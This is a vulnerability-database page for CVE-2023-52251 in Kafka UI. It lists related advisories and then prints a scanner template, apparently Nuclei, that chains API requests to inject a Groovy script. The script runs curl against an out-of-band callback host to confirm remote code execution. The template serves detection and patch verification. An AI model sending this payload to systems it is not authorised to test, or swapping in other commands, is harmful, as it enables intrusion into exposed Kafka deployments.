| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Kafka UI 0.7.1 Command Injection Exploit | 20 Feb 202400:00 | – | zdt | |
| Exploit for Code Injection in Provectus Ui | 6 Jan 202411:07 | – | githubexploit | |
| The vulnerability in the Apache Kafka cluster management web interface, kafka-ui, allows a attacker to execute arbitrary code. | 26 Feb 202400:00 | – | bdu_fstec | |
| CVE-2023-52251 | 25 Jan 202422:26 | – | circl | |
| kafka-ui OS Command Injection Vulnerability | 25 Jan 202400:00 | – | cnnvd | |
| CVE-2023-52251 | 25 Jan 202400:00 | – | cve | |
| CVE-2023-52251 | 25 Jan 202400:00 | – | cvelist | |
| Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option. | 17 Feb 202419:51 | – | metasploit | |
| CVE-2023-52251 | 25 Jan 202421:15 | – | nvd | |
| CVE-2023-52251 | 25 Jan 202421:15 | – | osv |
id: CVE-2023-52251
info:
name: Kafka UI 0.7.1 Command Injection
author: yhy0,iamnoooob
severity: high
description: |
An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
impact: |
Authenticated attackers can inject and execute arbitrary commands via Groovy script injection in the filterQueryType parameter.
remediation: |
Upgrade Kafka UI to version 0.7.2 or later.
reference:
- http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html
- https://github.com/BobTheShoplifter/CVE-2023-52251-POC
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-52251
cwe-id: CWE-94
epss-score: 0.85025
epss-percentile: 0.99685
cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:*
metadata:
verified: true
max-request: 3
vendor: provectus
product: ui
framework: kafka
fofa-query: icon_hash="-1477045616"
tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm,vuln,vkev
http:
- raw:
- |
GET /api/clusters HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: cluster-name
internal: true
json:
- '.[0].name'
- raw:
- |
GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: topic-name
internal: true
json:
- '.topics[].name'
- raw:
- |
@timeout 20s
GET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- 'Assigning partitions'
# digest: 4a0a0047304502205129876f997ec0c3db2e1579abeac73c205cd59bc5da9c494f611f05a58b51ef022100e02145fc45e48059ee323d25afbf20ef0dfcc3da333680f6183ed206b02912a5:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation